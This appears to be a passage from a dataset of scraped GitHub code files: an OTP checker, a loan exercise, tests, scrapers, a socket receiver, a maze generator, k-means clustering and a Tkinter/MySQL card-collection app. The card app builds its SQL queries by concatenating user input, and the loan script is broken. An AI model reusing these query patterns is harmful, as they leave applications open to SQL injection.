count_params = EmailCountDto(false_count + 1)\n status_params = UserLock(lockStatusFiled)\n\n if false_count >= 5:\n email_repo.update_user_status(asdict(status_params))\n raise LockedUser\n email_repo.update_false_count(asdict(count_params))\n raise VerifyOTP\n\n def check_otp(self, email_input: CheckEmailInputDto):\n user_status = email_input.user_status\n crypto_otp = email_input.crypto_otp\n req_otp = email_input.req_otp\n false_count = email_input.false_count\n uid = email_input.uid\n email_repo = email_input.repo\n _, _, hasher = self.create_crypt_num(self._argon_entity)\n \n if user_status == lockStatusFiled:\n raise LockedUser\n try:\n hasher.verify(crypto_otp, req_otp)\n return 'correct'\n except:\n self.check_user_status(email_repo, false_count, uid)","repo_name":"mo-zza/application_api","sub_path":"src/domain/services/email_domain_service.py","file_name":"email_domain_service.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42797991855","text":"casa = input('Quanto custa a casa? ')\nsalario = input('Qual o seu salário? ')\nanos = input('Em quantos anos vai pagar? ')\n\nprestacao = casa/(anos*12)\n\nif prestacao > salario * 0.3:\n print ('Empréstimo não aprovado')\nelse:\n print ('Empréstimo aprovado')\n ","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_179/ch26_2020_03_24_19_53_43_324171.py","file_name":"ch26_2020_03_24_19_53_43_324171.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73609802613","text":"# -*- coding: utf-8 -*-\nfrom unittest import mock\n\nimport pytest\n\nfrom YouPy import YouTubeItem\nfrom YouPy.exceptions import VideoUnavailable\n\n\n@mock.patch(\"YouPy.youtube_item.YouTubeItem\")\ndef test_prefetch_deferred(youtube_item):\n instance = youtube_item.return_value\n instance.prefetch_descramble.return_value = None\n YouTubeItem(\"https://www.youtube.com/watch?v=9bZkp7q19f0\", True)\n assert not instance.prefetch_descramble.called\n\n\n@mock.patch(\"urllib.request.install_opener\")\ndef test_install_proxy(opener):\n proxies = {\"http\": \"http://www.example.com:3128/\"}\n YouTubeItem(\n \"https://www.youtube.com/watch?v=9bZkp7q19f0\",\n defer_prefetch_init=True,\n proxies=proxies,\n )\n opener.assert_called()\n\n\n@mock.patch(\"YouPy.request.get\")\ndef test_video_unavailable(get):\n get.return_value = None\n youtube_item = YouTubeItem(\n \"https://www.youtube.com/watch?v=9bZkp7q19f0\", defer_prefetch_init=True\n )\n with pytest.raises(VideoUnavailable):\n youtube_item.prefetch()\n","repo_name":"kazanture/YouPy","sub_path":"tests/test_youtube_item.py","file_name":"test_youtube_item.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"27952306872","text":"from .base import Generator\n\n\nclass Select(Generator):\n\n def get_arguments(self, table=None, where=None, pk='id', **kwargs):\n super().get_arguments(**kwargs)\n\n self.table = table\n self.where = self.parse_vars(where)\n self.pk = pk\n\n def generate(self):\n backend = self.blueprint.backend\n\n while True:\n where = self.evaluate(self.where)\n values = backend.select_random(self.table, fields=(self.pk,),\n where=where, max_rows=10000)\n for value in values:\n if self.evaluate(self.where) != where:\n break\n yield value\n","repo_name":"peopledoc/populous","sub_path":"populous/generators/select.py","file_name":"select.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"11113837534","text":"#!/usr/bin/python3\n\"\"\"\nSends a request to a URL and displays the value of the X-Request-Id variable\n\"\"\"\n\nimport urllib.request\nimport sys\n\nif __name__ == \"__main__\":\n url = sys.argv[1]\n with urllib.request.urlopen(url) as response:\n headers = response.headers\n\n x_request_id = headers.get('X-Request-Id')\n print(x_request_id)\n","repo_name":"EJmpa/alx-higher_level_programming","sub_path":"0x11-python-network_1/1-hbtn_header.py","file_name":"1-hbtn_header.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23509257999","text":"import os\nimport requests\n\ndef content() :\n os.system('clear')\n print(\"Welcome to IsItDown.py!\")\n url = input(\"Please write a URL or URLs you want to check. (separated by comma)\\n\")\n split_url = url.split(\",\")\n s_url = []\n for each_url in split_url:\n replace_url = each_url.replace(\" \", \"\")\n s_url.append(replace_url)\n\n for st_url in s_url :\n lower_url = st_url.lower()\n if \".com\" not in lower_url:\n print(f\"{lower_url} is not a valid syntax!\")\n else :\n if lower_url.startswith(\"http://\"):\n try :\n result = requests.get(lower_url)\n print(f\"{lower_url} is up!\")\n except : \n print(f\"{lower_url} is down!\")\n else :\n ori_url = \"http://\" + lower_url\n try :\n result = requests.get(ori_url)\n print(f\"{ori_url} is up!\")\n except : \n print(f\"{ori_url} is down!\")\n\ndef answer():\n ans = input(\"Do you want to start over? : \")\n up_ans = ans.upper()\n if up_ans == 'Y' or up_ans == 'YES' :\n content()\n elif up_ans == 'N' or up_ans == 'NO':\n print(\"k, bye!\")\n else :\n print(\"That's not a valid answer\")\n answer()\n\ncontent()\nanswer()\n \n","repo_name":"nitronium102/python-scrapper","sub_path":"day4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20833243484","text":"#-*-coding:utf-8-*-\n#/usr/bin/env python\n__author__ = \"Allan\"\nimport socket\n\nsk = socket.socket()\nsk.bind(('127.0.0.1',9999,))\nsk.listen(5)\n\nwhile True:\n conn,access = sk.accept()\n conn.sendall(bytes(\"Welcome\",encoding='utf-8'))\n file_size = str(conn.recv(1024),encoding='utf-8')\n conn.sendall(bytes(\"Received\",encoding='utf-8'))\n\n total_size = int(file_size)\n has_recv = 0\n f = open('new.jpg','wb')\n while True:\n if total_size ==has_recv:\n break\n data = conn.recv(1024)\n f.write(data)\n has_recv += len(data)\n\n f.close()","repo_name":"nurruden/training","sub_path":"day10/socket_file/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21236280630","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\n\nwebsite = requests.get('https://quotes.toscrape.com/')\nsoup = BeautifulSoup(website.text, 'html.parser')\n\ntitle = soup.select_one('title').text\n# print(title)\n\nlink = soup.find(href = '/login').text\n# print(link)\n\nlinks = soup.find_all('a')\n# print(links)\n\n# for link in links:\n # print(link.text)\n\nquote = soup.find(class_ = 'text').text\n# print(quote)\n\nquotes = soup.find_all(class_ = 'text')\n\n# for quote in quotes:\n # print(quote.text)\n\nauthor = soup.find(class_ = 'author').text\n# print(author)\n\nauthors = soup.find_all(class_ = 'author')\n\n# for author in authors:\n# print(author.text)\n\n######################################################################\n'''\nquote = soup.select('.quote')\nfor item in quote:\n quotes = item.select_one('.text')\n authors = item.select_one('.author')\n tags = item.select('.tags')\n print(quotes.text)\n print(authors.text)\n for tag in tags:\n print(tag.text)\n print('======================================================')\n'''\n\n# next_button = soup.select_one('.next')\n# print(next_button.text)\n\nnext_button = True\npage = 1\nwhile(next_button):\n website = requests.get('https://quotes.toscrape.com/page/' + str(page))\n soup = BeautifulSoup(website.text, 'html.parser')\n next_button = soup.select_one('.next')\n quotes = soup.select('.quote')\n print(f'page: {page}')\n for quote in quotes:\n text = quote.select_one('.text')\n author = quote.select_one('.author')\n tags = quote.select('.tags')\n print(text.text)\n print(author.text)\n for tag in tags:\n print(tag.text)\n print('================================================================')\n page += 1\n \n\n","repo_name":"An0816/PyTorchZeroToAll","sub_path":"web scraping/beautifulsoup_prac1.py","file_name":"beautifulsoup_prac1.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3752722554","text":"import pygame as ga\nimport numpy as np\nfrom math import *\nimport pygame.gfxdraw as gfx\nimport random\n\nclass Cell():\n surface = None\n color = (80,80,80)\n res = 20\n\n def __init__(self,i,j) -> None:\n self.i = i\n self.j = j\n x = self.i * self.res \n y = self.j * self.res\n self.border = [1,1,1,1]\n self.visited = False\n self.wall = [(x,y),(x+self.res,y),(x+self.res,y+self.res),(x,y+self.res)] # N E S O\n\n def Show(self):\n # if self.visited:\n # ga.draw.rect(self.surface,(255,0,255),ga.Rect(self.wall[0][0],self.wall[0][1],self.res,self.res))\n for i in range(4):\n if self.border[i]:\n ga.draw.line(self.surface,self.color,self.wall[i],self.wall[(i+1)%4],20)\n\n def getRC(self):\n return self.i,self.j\n\nclass Maze():\n width = 0\n height = 0\n\n def __init__(self,l,c,res,color=(80,80,80)):\n Cell.surface = ga.Surface((self.width,self.height))\n Cell.color = color\n self.res = res\n Cell.res = self.res\n self.cells = []\n self.l = l\n self.c = c\n\n for j in range(self.c):\n for i in range(self.l):\n self.cells.append(Cell(i,j))\n\n def Show(self):\n img = np.zeros((self.width,self.height),np.int64)\n for c in self.cells:\n c.Show()\n ga.display.flip()\n ga.pixelcopy.surface_to_array(img,Cell.surface,'P')\n return img\n\n def getId(self,v):\n i,j = v\n if (i>=0 and i<self.c and j>= 0 and j<self.l):\n return (i+self.c*j)\n else:\n return -1 \n\n def findVoisin(self,id):\n i,j = self.cells[id].getRC()\n v = [(i-1,j),(i+1,j),(i,j-1),(i,j+1)]\n liste = []\n for k in range(4):\n nId = self.getId(v[k])\n if nId>0 :\n if not(self.cells[nId].visited):\n liste.append(nId)\n if len(liste)>0:\n return random.choice(liste)\n else:\n return None\n\n def removeWall(self,a,b):\n x = b.i - a.i\n if x == 1:\n a.border[1] = 0\n b.border[3] = 0\n elif (x == -1):\n a.border[3] = 0\n b.border[1] = 0\n y = b.j - a.j\n if y ==1:\n a.border[2] = 0\n b.border[0] = 0\n elif y == -1:\n a.border[0] = 0\n b.border[2] = 0\n \n def Build(self,id):\n next = id\n stack = []\n stack.append(next)\n while next != None:\n self.cells[next].visited = True\n next = self.findVoisin(next)\n if next != None:\n stack.append(next)\n self.removeWall(self.cells[id],self.cells[next])\n id = next\n else:\n print(stack)\n if not stack==[]:\n # print(next)\n next = stack.pop()\n self.removeWall(self.cells[id],self.cells[next])\n id = next\n","repo_name":"e-coucou/Machine-Learning","sub_path":"0-Drafts/Ants/Maze.py","file_name":"Maze.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37813249692","text":"######### Date calculator ##############\r\nfrom tkinter import * # import all methods and classes from the tkinter\r\n#tkcalendar module install bhi krna hoga\r\nfrom tkcalendar import DateEntry # import DateEntry from tkcalen\r\n\r\nroot=Tk()\r\nroot.geometry(\"300x200\")\r\nroot.title(\"Date calculator\")\r\n\r\ndef difference():\r\n date_dif=cal1.get_date() - cal2.get_date() #date difference\r\n combo1.set(date_dif) # date_dif ka value combo1 me update kr do\r\n\r\n\r\nlbl=Label(root,text=\"Date difference\",font=\"arial 15 bold\").grid(row=1,column=2)\r\n\r\n################# from #############\r\nlbl=Label(root,text=\"From\",font=\"arial 15 bold\").grid(row=2,column=1)\r\ncal1 = DateEntry(root, width=10, year=2020, month=6, day=2,font=\"arial 15 bold\", background='darkblue', foreground='white', borderwidth=2)\r\ncal1.grid(row=2,column=2)\r\n\r\n############## To ###############\r\n\r\nlbl=Label(root,text=\"To\",font=\"arial 15 bold\").grid(row=3,column=1)\r\ncal2 = DateEntry(root, width=10, year=2019, month=6, day=22,font=\"arial 15 bold\", background='darkblue', foreground='white', borderwidth=2)\r\ncal2.grid(row=3,column=2)\r\n\r\n\r\n############ Difference #############\r\n\r\nlbl3=Label(root,text=\"Differnce\",font=\"arial 15 bold\").grid(row=5,column=1)\r\nb=Button(root,text=\"click\",font=\"lucinda 15 bold\",command=difference).grid(row=4,column=2)\r\n\r\ncombo1=StringVar(root)\r\nentry1=Entry(root,textvariable=combo1,font=\"arial 12 bold\",width=18).grid(row=5,column=2)\r\n\r\nroot.resizable(0,0) # frame ko fix kr diya\r\nroot.mainloop()\r\n","repo_name":"Noushad96/date-difference","sub_path":"tkdateconvertor.py","file_name":"tkdateconvertor.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32460233176","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.cluster import KMeans, DBSCAN\nfrom sklearn.metrics import davies_bouldin_score as dbi\nfrom sklearn.manifold import MDS\nfrom matplotlib import pyplot as plt\nfrom sklearn.decomposition import PCA\n\n\ndef pre_process_task2(raw_data=pd.DataFrame()):\n train_data = raw_data.iloc[:, [0, 1, 3]]\n BSSID_col = list(train_data.index.unique())\n idx = train_data.finLabel.unique()\n design_mat = pd.DataFrame(columns=BSSID_col + ['RoomLabel'], index=idx)\n for fin in train_data.finLabel.unique():\n design_mat.loc[fin, :-1] = train_data.iloc[(train_data.loc[:, 'finLabel'] == fin).tolist(), 0]\n design_mat.loc[fin, 'RoomLabel'] = train_data.iloc[(train_data.loc[:, 'finLabel'] == fin).tolist(), 1].iloc[0]\n design_mat = design_mat.fillna(-500)\n return design_mat\n\n\ndef task2():\n raw_data1 = pd.read_csv('./data/Task2/DataSetKMeans1.csv', index_col=0)\n raw_data2 = pd.read_csv('./data/Task2/DataSetKMeans2.csv', index_col=0)\n data1, data2 = pre_process_task2(raw_data1), pre_process_task2(raw_data2)\n data = (data1, data2)\n trans = PCA(n_components=2), PCA(n_components=2)\n # trans = MDS(n_components=2), MDS(n_components=2)\n transformed = trans[0].fit_transform(data1.iloc[:, :-1]), trans[1].fit_transform(data2.iloc[:, :-1])\n dbi_record = pd.DataFrame(columns=pd.Series(list(range(2, 6)) + ['truth'], name='k'),\n index=pd.Series([1, 2], name='data_idx'))\n\n for data_idx in (0, 1):\n plt.scatter(transformed[data_idx][:, 0], transformed[data_idx][:, 1],\n c=data[data_idx].iloc[:, -1], marker='.')\n dbi_score = dbi(data[data_idx].iloc[:, :-1], data[data_idx].iloc[:, -1])\n dbi_record.loc[data_idx + 1, 'truth'] = dbi_score\n plt.title(f'data {data_idx + 1} with true label')\n # plt.savefig(fname=f'data {data_idx + 1} with true label.svg')\n plt.show()\n for k in range(2, 6):\n cls = KMeans(n_clusters=k, init='k-means++')\n predict = cls.fit_predict(data[data_idx].iloc[:, :-1])\n centroids = cls.cluster_centers_\n centroids_trans = trans[data_idx].transform(centroids)\n # centroids, clusterAssment = kMeans(data[data_idx].iloc[:, :-1].values, k)\n # centroids = np.array(centroids)\n dbi_score = dbi(data[data_idx].iloc[:, :-1], predict)\n dbi_record.loc[data_idx + 1, k] = dbi_score\n plt.scatter(transformed[data_idx][:, 0], transformed[data_idx][:, 1], c=predict, marker='.',\n label='data point', alpha=0.3)\n plt.scatter(centroids_trans[:, 0], centroids_trans[:, 1], marker='+',\n c=list(range(centroids_trans.shape[0])), label='centroid', edgecolors='black', s=150)\n plt.legend()\n plt.title(f'{k}-means on data {data_idx + 1}')\n # plt.savefig(fname=f'{k}-means on data {data_idx + 1}.svg')\n plt.show()\n print(dbi_record)\n pass\n\n\nif __name__ == '__main__':\n task2()\n","repo_name":"JyChang012/ML_Projects","sub_path":"Clustering/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":3063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21808363107","text":"import Tkinter\nimport MySQLdb\n\n\ndef connect(userID, password):\n global con\n global cur\n global uID\n con.close()\n cur.close()\n con= MySQLdb.connect(host= \"Infectionserver.no-ip.org\",\n port= 3307,\n user= userID,\n passwd= password,\n db = \"CSC335\")\n cur=con.cursor()\n cur.execute(\"select user_ID from users where name='\"+user+\"';\")\n uID=int(cur.fetchone()[0])\n return con\n\ndef conn(userID):#only used for initial database panel\n conn= MySQLdb.connect(host= \"Infectionserver.no-ip.org\",\n port= 3307,\n user= userID,\n db = \"CSC335\")\n return conn\n\nclass databasePanel:\n def __init__(self, frameL):\n self.search = LabelFrame(frameL,text=\"search\")\n self.search.pack(fill=X)\n self.sIn= Entry(self.search)\n self.sIn.pack(fill=X)\n self.searchButton = Button(self.search, text=\"go\", command=self.updateSearch)\n self.searchButton.pack(fill=X)\n #DATABASE LIST\n self.database = LabelFrame(frameL, text=\"Database\")\n self.database.pack(fill=X)\n self.scrollbarL = Scrollbar(self.database)\n \n\n self.mylistL = Listbox(self.database, yscrollcommand = self.scrollbarL.set, selectmode=SINGLE)\n cur.execute(\"select name, ed_index from card;\")\n self.dataList =cur.fetchall()\n for line in self.dataList:\n self.mylistL.insert(END, line)\n #CARDVIEW TEXT\n self.cardview= LabelFrame(frameL, text=\"cardview\")\n self.cardview.pack(fill=X)\n\n self.mylistL.pack( side = LEFT, fill = BOTH )\n self.scrollbarL.pack( side = LEFT, fill=Y )\n #select button\n self.cardupdatebutton=Button(self.database, text=\"select\",command=self.updateCard)\n self.scrollbarL.config( command = self.mylistL.yview )\n self.cardupdatebutton.pack()\n \n self.card = Label(self.cardview,text=\"\")\n self.card.pack(fill=Y)\n\n def updateSearch(self):\n self.mylistL.delete(0,self.mylistL.size())\n #get search results from server and store in newList\n cur.execute(\"select name, ed_index from card where name ='\"+self.sIn.get()+\"'\")\n newList=cur.fetchall()\n for x in newList:\n self.mylistL.insert(END,x)\n\n def updateCard(self):\n self.sel=self.mylistL.curselection()\n #print(self.sel)\n #print(self.mylistL.get(self.sel))\n cur.execute(\"select name, ed_index, mainType, subType, attack, defense from card where name='\"+self.mylistL.get(self.sel)[0]+\"' and ed_index='\"+self.mylistL.get(self.sel)[1]+\"';\")\n self.Cdata=cur.fetchone()\n self.card.config(text=self.Cdata)\n\n def refresh(self):\n self.mylistL.delete(0,END)\n cur.execute(\"select name, ed_index from card\")\n newList=cur.fetchall()\n for x in newList:\n self.mylistL.insert(END,x)\n \nclass collectionPanel:\n def __init__(self, frameR):\n self.colV=LabelFrame(frameR, text=\"collection\")\n self.colV.pack()\n self.scrollbarR = Scrollbar(self.colV)\n \n #card collection menu\n self.mylistR = Listbox(self.colV, yscrollcommand = self.scrollbarR.set )\n cur.execute(\"select card_name, ed_index, number from cards_owned where user_ID='\"+str(uID)+\"';\")\n self.dataList=cur.fetchall()\n for line in self.dataList:\n self.mylistR.insert(END, line)\n\n self.mylistR.pack( side = LEFT, fill = BOTH )\n self.scrollbarR.pack( side = LEFT, fill=Y )\n self.scrollbarR.config( command = self.mylistR.yview )\n self.buttons=Frame(self.colV)\n self.buttons.pack(side=LEFT,fill=Y)\n self.addC=Button(self.buttons, text=\"add Card\", command=lambda:self.addCard)\n self.remC=Button(self.buttons, text=\"remove Card\",command=lambda:self.removeCard())\n self.selC=Button(self.buttons, text=\"select\",command=lambda:self.updateCard)\n self.addC.pack(fill=X)\n self.remC.pack(fill=X)\n self.selC.pack(fill=X)\n \n def hide(self):\n self.colV.pack_forget()\n\n def show(self):\n self.colV.pack()\n\n def updateCard(self, databasePanel):\n self.sel=self.mylistR.curselection()\n #print(self.sel)\n #print(self.mylistL.get(self.sel))\n cur.execute(\"select name, ed_index, mainType, subType, attack, defense from card where name='\"+self.mylistR.get(self.sel)[0]+\"' and ed_index='\"+self.mylistR.get(self.sel)[1]+\"';\")\n databasePanel.Cdata=cur.fetchone()\n databasePanel.card.config(text=databasePanel.Cdata)\n\n def addCard(self, databasePanel):\n searchKey=databasePanel.mylistL.get(databasePanel.mylistL.curselection())\n cur.execute(\"select number from cards_owned where card_name='\"+searchKey[0]+\"' and user_ID=\"+str(uID)+\" and ed_index='\"+searchKey[1]+\"';\")\n count=cur.fetchone()\n if count:\n count=int(count[0])+1\n cur.execute(\"UPDATE cards_owned SET number=\"+str(count)+\" WHERE card_name='\"+searchKey[0]+\"' and user_ID=\"+str(uID)+\" and ed_index='\"+searchKey[1]+\"';\")\n else:\n cur.execute(\"INSERT INTO cards_owned(user_ID, card_name, ed_index, number) VALUES(\"+str(uID)+\",'\"+searchKey[0]+\"', '\"+searchKey[1]+\"', 1);\")\n con.commit()\n self.refresh()\n\n def removeCard(self):\n searchKey=self.mylistR.get(self.mylistR.curselection())\n cur.execute(\"select number from cards_owned where card_name='\"+searchKey[0]+\"' and user_ID=\"+str(uID)+\" and ed_index='\"+searchKey[1]+\"';\")\n count=int(cur.fetchone()[0])\n if count>1:\n count=count-1\n cur.execute(\"UPDATE cards_owned SET number=\"+str(count)+\" WHERE card_name='\"+searchKey[0]+\"' and user_ID=\"+str(uID)+\" and ed_index='\"+searchKey[1]+\"';\")\n else:\n cur.execute(\"DELETE FROM cards_owned WHERE card_name='\"+searchKey[0]+\"' and user_ID=\"+str(uID)+\" and ed_index='\"+searchKey[1]+\"';\")\n con.commit()\n self.refresh()\n \n def refresh(self):\n self.mylistR.delete(0,END)\n cur.execute(\"select card_name,ed_index,number from cards_owned where user_ID=\"+str(uID)+\";\")\n self.dataList=cur.fetchall()\n for line in self.dataList:\n self.mylistR.insert(END, line)\n \nclass deckPanel:\n def __init__(self,frameR):\n self.deckV=LabelFrame(frameR, text=\"deck\")\n self.deckV.pack(side=LEFT)\n \n #deck selection menu\n self.deckScroll = Scrollbar(self.deckV)\n self.deckScroll.pack( side = LEFT, fill=Y )\n self.deckList = Listbox(self.deckV, yscrollcommand = self.deckScroll.set )\n cur.execute(\"select deck_name from owned_decks where user_ID='\"+str(uID)+\"';\")\n self.dataList=cur.fetchall()\n for line in self.dataList:\n self.deckList.insert(END, line[0])\n\n self.deckList.pack( side = LEFT, fill = BOTH )\n self.deckScroll.config( command = self.deckList.yview )\n\n #deck display menu\n self.dcScroll=Scrollbar(self.deckV)\n self.dcList = Listbox(self.deckV, yscrollcommand = self.dcScroll.set)\n self.dcList.pack(side=LEFT,fill=BOTH)\n self.dcScroll.pack(side=LEFT,fill=Y)\n self.dcScroll.config(command=self.dcList.yview)\n self.buttons=Frame(self.deckV)\n self.buttons.pack(side=LEFT,fill=Y)\n self.addC=Button(self.buttons, text=\"add Card\", command=lambda:self.addCard)\n self.remC=Button(self.buttons, text=\"remove Card\",command=lambda:self.removeCard())\n self.selC=Button(self.buttons, text=\"select\",command=lambda:self.updateCard)\n self.addD=Button(self.buttons, text=\"new Deck\", command=lambda:self.addDeck())\n self.remD=Button(self.buttons, text=\"delete Deck\", command=lambda:self.removeDeck())\n self.selD=Button(self.buttons, text=\"select Deck\", command=lambda:self.selDeck())\n self.deckName=LabelFrame(self.buttons, text=\"Deck Name\")\n self.newD=Entry(self.deckName)\n self.addC.pack(fill=X)\n self.remC.pack(fill=X)\n self.selC.pack(fill=X)\n self.deckName.pack(fill=X)\n self.newD.pack(fill=X)\n self.addD.pack(fill=X)\n self.remD.pack(fill=X)\n self.selD.pack(fill=X)\n \n def hide(self):\n self.deckV.pack_forget()\n\n def show(self):\n self.deckV.pack()\n\n def updateCard(self, databasePanel):\n self.sel=self.dcList.curselection()\n #print(self.sel)\n #print(self.mylistL.get(self.sel))\n cur.execute(\"select name,ed_index, mainType, subType, attack, defense from card where name='\"+self.dcList.get(self.sel)[0]+\"' and ed_index='\"+self.dcList.get(self.sel)[1]+\"';\")\n databasePanel.Cdata=cur.fetchone()\n databasePanel.card.config(text=databasePanel.Cdata)\n\n def addCard(self, databasePanel):\n searchKey=str(databasePanel.mylistL.get(databasePanel.mylistL.curselection())[0])\n cur.execute(\"select number from deck where card_name='\"+searchKey+\"' and deck_ID=\"+str(deckID)+\";\")\n count=cur.fetchone()\n if count:\n count=int(count[0])+1\n cur.execute(\"UPDATE deck SET number=\"+str(count)+\" WHERE card_name='\"+searchKey+\"' and deck_ID=\"+str(deckID)+\";\")\n\n else:\n cur.execute(\"INSERT INTO deck(deck_ID, card_name, number, ed_index) VALUES (\"+str(deckID)+\",'\"+searchKey+\"', 1, '\"+databasePanel.mylistL.get(databasePanel.mylistL.curselection())[1]+\"');\")\n con.commit()\n self.refreshD()\n \n def removeCard(self):\n searchKey=str(self.dcList.get(self.dcList.curselection())[0])\n cur.execute(\"select number from deck where card_name='\"+searchKey+\"' and deck_ID=\"+str(deckID)+\";\")\n count=int(cur.fetchone()[0])\n if count>1:\n count=count-1\n cur.execute(\"UPDATE deck SET number=\"+str(count)+\" WHERE card_name='\"+searchKey+\"' and deck_ID=\"+str(deckID)+\";\")\n else:\n cur.execute(\"DELETE FROM deck WHERE card_name='\"+searchKey+\"' and deck_ID=\"+str(deckID)+\";\")\n con.commit()\n self.refreshD()\n \n def selDeck(self):\n global deckID\n searchKey=str(self.deckList.get(self.deckList.curselection())[0])\n self.dcList.delete(0,END)\n cur.execute(\"select deck_ID from owned_decks where deck_name='\"+searchKey+\"';\")\n deckID=int(cur.fetchone()[0])\n cur.execute(\"select card_name, ed_index, number from deck where deck_ID=\"+str(deckID)+\";\")\n self.deckData=cur.fetchall()\n for x in self.deckData:\n self.dcList.insert(END,x)\n \n def addDeck(self):\n cur.execute(\"INSERT INTO owned_decks(user_ID, deck_name) VALUES(\"+str(uID)+\",'\"+self.newD.get()+\"');\")\n con.commit()\n self.refresh()\n \n def removeDeck(self):\n cur.execute(\"DELETE FROM deck where deck_ID=\"+str(deckID)+\";\")\n cur.execute(\"DELETE FROM owned_decks where deck_ID=\"+str(deckID)+\";\")\n con.commit()\n self.refresh()\n self.refreshD()\n \n def refresh(self):\n global deckID\n deckID=''\n cur.execute(\"select deck_name from owned_decks where user_ID='\"+str(uID)+\"';\")\n self.dataList=cur.fetchall()\n self.deckList.delete(0,END)\n self.dcList.delete(0,END)\n for line in self.dataList:\n self.deckList.insert(END, line)\n \n def refreshD(self):\n cur.execute(\"select card_name, ed_index, number from deck where deck_ID='\"+str(deckID)+\"'\")\n self.dcList.delete(0,END)\n self.deckData=cur.fetchall()\n for x in self.deckData:\n self.dcList.insert(END,x) \n\nclass adminPanel:\n def __init__(self,frameR):\n self.admV=LabelFrame(frameR, text=\"admin\")\n self.admV.pack()\n #creates user options\n self.tools=LabelFrame(self.admV, text=\"admin tools\")\n self.tools.pack()\n \n self.users=Button(self.tools, text=\"user options\", command=lambda: self.userO())\n self.users.pack(fill=X)\n self.userV=LabelFrame(self.tools, text=\"Users\")\n self.userV.pack()\n self.userSB=Scrollbar(self.userV)\n self.userList= Listbox(self.userV,yscrollcommand = self.userSB.set )\n self.userSB.config( command = self.userList.yview )\n self.newUser= LabelFrame(self.userV, text=\"new user\")\n self.userName= Entry(self.newUser)\n self.addU=Button(self.newUser, text=\"add User\", command=lambda: self.adduser())\n self.delU=Button(self.userV, text=\"delete User\", command=lambda: self.deluser())\n self.selU=Button(self.userV, text=\"select User\", command=lambda: self.seluser())\n #displays user options\n self.userList.pack(side=LEFT, fill=BOTH)\n self.userSB.pack(side=LEFT,fill=Y)\n self.newUser.pack(fill=X)\n self.userName.pack(fill=X)\n self.addU.pack(fill=X)\n self.delU.pack(fill=X)\n self.selU.pack(fill=X)\n #removes user options\n self.userV.pack_forget()\n\n #creates card options\n self.cards=Button(self.tools, text=\"card options\", command=lambda: self.cardO())\n self.cards.pack(fill=X)\n self.cardV=LabelFrame(self.tools, text=\"Cards\")\n self.cardN=LabelFrame(self.cardV, text=\"new card\")\n self.cName=Entry(self.cardN)\n self.cName.insert(0,\"name\")\n self.cEd=Entry(self.cardN)\n self.cEd.insert(0, \"Edition\")\n \n self.cCostR=Entry(self.cardN)\n self.cCostR.insert(0,\"cost Red\")\n self.cCostBu=Entry(self.cardN)\n self.cCostBu.insert(0,\"cost Blue\")\n self.cCostW=Entry(self.cardN)\n self.cCostW.insert(0,\"cost White\")\n self.cCostBa=Entry(self.cardN)\n self.cCostBa.insert(0,\"cost Black\")\n self.cCostG=Entry(self.cardN)\n self.cCostG.insert(0,\"cost Green\")\n self.cCost=Entry(self.cardN)\n self.cCost.insert(0,\"cost colorless\")\n self.cCostx=Entry(self.cardN)\n self.cCostx.insert(0,\"cost X\")\n self.cCosts=Entry(self.cardN)\n self.cCosts.insert(0,\"cost special\")\n self.cCostsv=Entry(self.cardN)\n self.cCostsv.insert(0,\"cost special value\")\n \n self.cStr=Entry(self.cardN)\n self.cStr.insert(0,\"strength\")\n self.cHP=Entry(self.cardN)\n self.cHP.insert(0, \"life\")\n self.cAbility=Entry(self.cardN)\n self.cAbility.insert(0,\"Abilities\")\n self.cFlavor=Entry(self.cardN)\n self.cFlavor.insert(0,\"flavor\")\n self.cRare=Entry(self.cardN)\n self.cRare.insert(0,\"rarity\")\n self.cT1=Entry(self.cardN)\n self.cT1.insert(0,\"Type1\")\n self.cT2=Entry(self.cardN)\n self.cT2.insert(0,\"Type2\")\n self.cEd=Entry(self.cardN)\n self.cEd.insert(0,\"edition index\")\n self.addC=Button(self.cardN, text=\"add Card\")\n self.delC=Button(self.cardV, text=\"delete Card\")\n \n self.cardV.pack(fill=X)\n self.cardN.pack(fill=X)\n #displays entry boxes\n self.cName.pack(fill=X)\n self.cEd.pack(fill=X)\n \n \n self.cCostR.pack(fill=X)\n self.cCostBu.pack(fill=X)\n self.cCostW.pack(fill=X)\n self.cCostBa.pack(fill=X)\n self.cCostG.pack(fill=X)\n self.cCost.pack(fill=X)\n self.cCostx.pack(fill=X)\n self.cCosts.pack(fill=X)\n self.cCostsv.pack(fill=X)\n \n self.cT1.pack(fill=X)\n self.cT2.pack(fill=X)\n self.cAbility.pack(fill=X)\n self.cFlavor.pack(fill=X)\n self.cRare.pack(fill=X)\n self.cStr.pack(fill=X)\n self.cHP.pack(fill=X)\n #displays buttons\n self.addC.pack(fill=X)\n self.delC.pack(fill=X)\n #removes card options\n self.cardV.pack_forget()\n #removes admin panel\n def hide(self):\n 